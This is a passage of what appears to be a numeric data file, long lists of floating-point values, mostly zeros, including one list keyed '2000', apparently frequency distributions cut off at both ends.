5.763435672472009e-05, 0.00022794150962583565, 0.00017910034225550791, 5.092222217040171e-05, 0.00011595263567439613, 0.00034649192542222956, 0.00011483511672712985, 0.0002666432149827354, 0.0, 0.0001034937942451705, 0.00017142215907212736, 0.00010092480962832242, 0.00010865824077198587, 0.0001642981444746268, 9.59780012970652e-07, 0.00010894198992451341, 0.00015988640483544238, 5.280464345644486e-05, 0.00020857562996583122, 5.0037248867440336e-05, 0.00017577097581334235, 0.000184367237195412, 9.111179326542572e-05, 0.0, 0.00017269517209133632, 7.526499258496479e-05, 4.443002384280828e-05, 2.3632853167383516e-05, 5.746764830208009e-05, 0.00012154731751607769, 0.0, 9.090642451751355e-05, 5.094116527442199e-05, 0.00010239040811196131, 0.00017532468688016527, 5.3035247598174246e-05, 5.805865576092257e-05, 2.994936000071893e-05, 0.00015796285184451603, 5.093315088425956e-05, 0.00010702872813913654, 5.501102659441525e-05, 6.289200365448841e-05, 5.153748392261281e-05, 0.00010784633668429154, 4.958400115850757e-05, 8.770501510010034e-05, 0.00011239827847534633, 5.153748392261281e-05, 0.0, 0.0, 0.00011863696789841663, 1.5337307610868297e-06, 5.763180255182226e-05, 6.289200365448841e-05, 0.0001711314056075364, 0.00015428835330698798, 0.0, 0.0, 4.246849357122589e-05, 0.00011571543290770862, 6.759422354041737e-05, 0.00010414016143523308, 9.460282187940072e-05, 0.0, 6.58805018555618e-05, 6.242174606478218e-05, 5.238887626844732e-05, 0.0, 0.00011090019190596636, 5.362666902345074e-05, 0.0, 0.00015988895486867587, 9.753365455621658e-05, 5.1228884365051674e-05, 0.0, 0.0, 0.0, 0.000106328719178555, 0.0, 0.0, 0.0, 0.0, 5.109338073220732e-05, 0.0, 4.8913338278432966e-05, 0.0, 0.0, 0.00011205213630188488, 5.1228884365051674e-05, 0.0, 4.0195594306638845e-05, 0.0, 6.997457607228028e-05, 0.0, 0.0, 0.00010701136638689418, 0.0, 7.151248621261196e-05, 0.0, 0.0, 6.759422354041737e-05, 5.494348383104224e-05, 0.0, 7.33801620142757e-05, 0.00010983612430465942, 5.886509963135232e-05, 5.286278918176585e-05, 0.0, 0.0, 0.00016763420061436597, 0.00010264239775967163, 5.3035247598174246e-05, 0.0, 5.547388660394571e-05, 3.051614628350751e-06, 0.0, 0.0, 0.0, 0.0, 6.289200365448841e-05, 0.0001167482212052618, 0.0, 0.0, 0.0, 3.4853456827689175e-05, 9.145248764061561e-05, 0.0, 5.3035247598174246e-05, 4.8913338278432966e-05, 0.0, 0.0, 5.805865576092257e-05, 4.8913338278432966e-05, 0.0, 5.1614821131814485e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 5.805865576092257e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.177747268340119e-05, 0.0, 0.0, 0.0, 5.1228884365051674e-05, 0.0, 5.1228884365051674e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.202619199628284e-05, 0.0, 3.051614628350751e-06, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.242174606478218e-05, 0.0, 0.0, 0.0, 5.1614821131814485e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00010628100540737105, 5.1228884365051674e-05, 0.0, 0.0, 6.475102755768133e-05, 0.0, 0.0, 0.0, 5.811857326258112e-05, 0.0, 0.0, 0.0, 0.00011487473331486457, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.1109475406011871e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.44281784139871e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.279776833545047e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.202619199628284e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.238887626844732e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.811857326258112e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.1614821131814485e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.695223335736152e-06, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
2000 : [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.489781837941068e-05, 0.0, 0.0, 5.2478180986745645e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00011868807143030399, 0.0, 0.0, 0.0, 5.956603142989399e-05, 5.3663279971668236e-05, 0.0, 5.661897675644882e-05, 5.310369057858382e-05, 0.0, 0.0, 0.00010658677491843884, 0.00012261014906095362, 0.0, 0.00017718613408014192, 0.00011856564095598046, 4.102681860133824e-05, 5.302299592099911e-05, 5.31667424758063e-05, 0.0, 0.0, 5.014261911086313e-05, 0.00011212806288239496, 0.0, 0.0, 2.99723536350873e-06, 5.403295600852979e-05, 5.5355364781969436e-05, 5.30692033115874e-05, 5.4482298443936533e-05, 0.0, 0.0, 0.00013501616202134505, 0.00010560313014448526, 0.0, 4.1989522744654814e-05, 0.00016656672120091097, 0.00018208044416237893, 0.00010976320238874832, 0.00011148544157186957, 0.00017084272288701743, 6.671695744728217e-05, 0.00010395435059893056, 0.0, 5.318743618897657e-05, 5.781096913585344e-05, 0.00024364587117571654, 0.00014281012200584688, 0.00016737241627726922, 0.00011566956290090555, 0.00022961627778110067, 0.00011473488896370896, 0.00014941805283688706, 0.00011322388936458741, 0.00048801141544130126, 0.0002882601637984111, 0.00022654950872546596, 0.0004120226394698338, 0.00021549056922573836, 0.00039320203543727973, 0.00012319786675065852, 0.00011091315453261954, 0.00010924727341567077, 0.0002132875242335736, 5.326308087700208e-05, 0.00016382547730962855, 0.000325213764220015, 0.00021062759398475823, 5.3139967151606245e-05, 0.0004140530451811534, 5.47577162746987e-05, 0.00015065098954416455, 0.000303095831101663, 0.0002300240907280627, 0.00036596166755688427, 0.000287172509269638, 0.00022148239700569333, 0.00035956392099135585, 0.00010826328363374998, 0.0006031231207538205, 0.00010804603685220365, 0.0003532521152339723, 0.000227388256918055, 0.00033901843947946076, 0.00026949500457564576, 0.000328425747805533, 0.0004181272780902031, 0.0003410961992254949, 0.00048637951422669123, 0.0003697532374678605, 0.0005203580094741436, 0.0005092227758596288, 0.00037782547681979365, 0.00024127724941874114, 0.0003632231431401669, 0.0007799374038939351, 0.0003926646618513386, 0.0008014621668437279, 0.00047436869098057936, 0.0006530466124514729, 0.0006469664085130163, 0.0008130540015906851, 0.0003512731765935254, 0.0006495043141792342, 0.0006697766576188956, 0.0005144185687863072, 0.0006965990652591759, 0.0009086091941117371, 0.0011133289663741242, 0.0009635621713661504, 0.001240531536781147, 0.0009606994982001355, 0.0009015991192881764, 0.00073704563457857, 0.00099047333399721, 0.0013406930592047505, 0.0012473275713677978, 0.0007558639656174577, 0.0018387696153138104, 0.0014436090170007352, 0.0015489379199301882, 0.001447839382927101, 0.0008014155163546719, 0.001479535738414691, 0.0012566911146572252, 0.0012857021987225654, 0.0017441413171385375, 0.0017816316417193208, 0.001603490200872571, 0.0015605450162060478, 0.0016712275768841936, 0.0019668073485365084, 0.002613081143408065, 0.001961992282048935, 0.002158288664497394, 0.0020246888075354658, 0.001668945815956609, 0.0019564429303693532, 0.002069959481198201, 0.003232134648509945, 0.002224970938496679, 0.001999328908962759, 0.002679256431581971, 0.002789845150093037, 0.003392581591329102, 0.00231122758452338, 0.002922838658935031, 0.002027670758750064, 0.0035612030852746244, 0.00368612768307684, 0.003297337095394675, 0.0035931845391106447, 0.00303076602657624, 0.003245338144004103, 0.003571726396522833, 0.0034780810057515447, 0.003296412961112633, 0.004149169397191483, 0.0032845269360425805, 0.00429331875894768, 0.004388791420151086, 0.005073299349721274, 0.004330776395714785, 0.0038972502620216076, 0.004290025299363004, 0.005257010923903983, 0.0048182027858814985, 0.005131859459686312, 0.005239822762275008, 0.004933062567729336, 0.004194288970894307, 0.005302956135496642, 0.005447031462601994, 0.005839517721509976, 0.005503207310448876, 0.005367077503298562, 0.005791842004072708, 0.0063496549984880125, 0.0069854399017297356, 0.007281108753086211, 0.007226417494816803, 0.007376909591279914, 0.006534651138805562, 0.007999799909690509, 0.008207822558225617, 0.008027297504687473, 0.008083613195763732, 0.007308109320134812, 0.008461487785482386, 0.009386604866690114, 0.010597439416507665, 0.008376782619989625, 0.010417226953717535, 0.00977308739166084, 0.010871807503028273, 0.011015819186310966, 0.01271081091197633, 0.012698125442562502, 0.013071836773786843, 0.01366865304066234, 0.014517753420547843, 0.01369384473770374, 0.015377447249771827, 0.01603787270320977, 0.015972869413865325, 0.01735702297787209, 0.01742689090661359, 0.018017678761334883, 0.01679808474335417, 0.02067929459731049, 0.0219159607460054, 0.02295515093677684, 0.021547079418084154, 0.02070661035281415, 0.020202895906510317, 0.020077274257317104, 0.018984233599457202, 0.018368376139925726, 0.01940778280628443, 0.017609062906419656, 0.017646577259790627, 0.01608355078392774, 0.015419445245506265, 0.012058300671911208, 0.013357622648682245, 0.009988109128883456, 0.008861236800343167, 0.00793551531929579, 0.00899991452515561, 0.007373177552155436, 0.005591189483381681, 0.006219789994833197, 0.004718241719851704, 0.003916685007295237, 0.0032715284429295642, 0.004054992558853455, 0.0028615308243408167, 0.0020651182211645688, 0.0025224034164626156, 0.0026679977527638175, 0.0022959673544746015, 0.0021132459396280504, 0.0017717257188459967, 0.0017605032996887101, 0.0014045400441998097, 0.0009908891836003493, 0.0012330169114825645, 0.0010514166237024674, 0.0010394815669118988, 0.0014284344030467207, 0.0008359905100828377, 0.000811817980106289, 0.0009275753779767281, 0.0007937594783787074, 0.0008432206323408549, 0.0008070768941506642, 0.0007492512317343251, 0.0008596310513036785, 0.0009102699948172473, 0.0006032061391415373, 0.0005351919990915941, 0.0004254740265708603, 0.0007096783037662426, 0.0005907018056753541, 0.000642502086595712, 0.00046711849061184307, 0.0006641985146862073, 0.0006579816605332886, 0.00044392708211568393, 0.00038316227653212797, 0.0005658868843935916, 0.000274058986441438, 0.00037681061220723894, 0.00022753389086938865, 0.0006182546560659691, 0.0002073419545806727, 0.00010906829545903592, 0.00034317404014987433, 0.0004919924014911358, 0.00012294587563735587, 5.490092164053772e-05, 0.0003821659205822846, 0.00011555641381738608, 0.0001718432595216399, 0.00043646746867571554, 0.0, 0.00012608395986927074, 0.00017414664094850282, 0.0002125621957189881, 0.00011296603988070436, 0.00017483346386800325, 7.300541090068932e-05, 0.00011337314928200779, 8.550935200487053e-05, 0.0002542800179246059, 5.7737800387357296e-05, 0.0002461789332006694, 0.00012226949766494107, 0.00025422424840143624, 5.4537158093153386e-05, 0.00017527136692159536, 0.00013066382563127867, 0.0002766753645080401, 5.900567760739204e-05, 5.320089149969762e-05, 8.621466329249595e-05, 0.0, 5.6199118972514005e-05, 0.00020139917205095785, 0.0001183424681552327, 0.00011211477669322648, 0.00016872526693016823, 0.00012381639162237627, 0.00018145064903039908, 0.00012611256170623835, 5.7040850469290054e-05, 5.507392622393642e-05, 0.00010346903262686492, 5.8441508402664516e-05, 0.00018274440184797429, 6.242607982941321e-05, 0.00012443153406304302, 0.0002310509426762623, 6.060311184959193e-05, 9.949851181870226e-05, 0.0001138428065983071, 9.348421116684418e-05, 6.139449924260426e-05, 6.0053696809109046e-05, 8.666642078367314e-05, 5.533848306859368e-05, 4.7052281275664757e-05, 0.0, 5.507392622393642e-05, 0.0, 0.0001371960035364997, 0.0, 6.373066995607597e-05, 0.00012161847439568487, 6.689607746602116e-05, 6.20125505739749e-05, 3.185611108856179e-05, 0.0, 5.900567760739204e-05, 0.00010426303802151076, 0.0001739254976063857, 5.481865753494532e-05, 6.181873727475017e-05, 0.0, 5.507392622393642e-05, 5.4490412896027985e-05, 0.00011879584921331439, 6.242984172694779e-07, 6.181873727475017e-05, 5.391457092174331e-05, 6.997896718804513e-05, 5.4490412896027985e-05, 0.0, 0.0, 5.4490412896027985e-05, 0.0, 0.0, 0.00017727162840738806, 0.0, 0.0, 5.490092164053772e-05, 6.242607982941321e-05, 0.0, 5.641177917755513e-05, 5.481865753494532e-05, 6.181873727475017e-05, 5.4358548821503106e-05, 5.741440615456715e-05, 6.638864515974381e-05, 0.0, 0.00011917765803035604, 0.0, 2.0977964219727932e-05, 0.0, 0.0, 0.0, 0.0, 6.139449924260426e-05, 0.0, 0.0, 0.0, 0.0, 5.7431020655889874e-05, 0.0, 0.0, 6.679583573939249e-05, 0.00012453789122501198, 5.502567584499331e-05, 0.0, 0.0, 0.0, 5.4490412896027985e-05, 7.047548100688972e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 5.8242134386791885e-05, 0.0, 5.6523734262913574e-05, 5.507392622393642e-05, 7.480841577244735e-05, 5.7431020655889874e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 6.950355297409696e-05, 0.0, 0.0001240072960308971, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.4358548821503106e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 6.622025421229874e-05, 0.0, 5.741440615456715e-05, 0.0, 0.0001112304333300694, 0.0, 0.0, 0.0, 0.0, 0.0, 6.561166692300892e-05, 0.00013549718430597588, 0.0, 6.782977726307505e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.679583573939249e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.900567760739204e-05, 5.2027444989745866e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.7040850469290054e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.490092164053772e-05, 0.0, 0.0, 3.7072431989289053e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 5.641177917755513e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.507392622393642e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.881626461224015e-05, 0.0, 5.6199118972514005e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 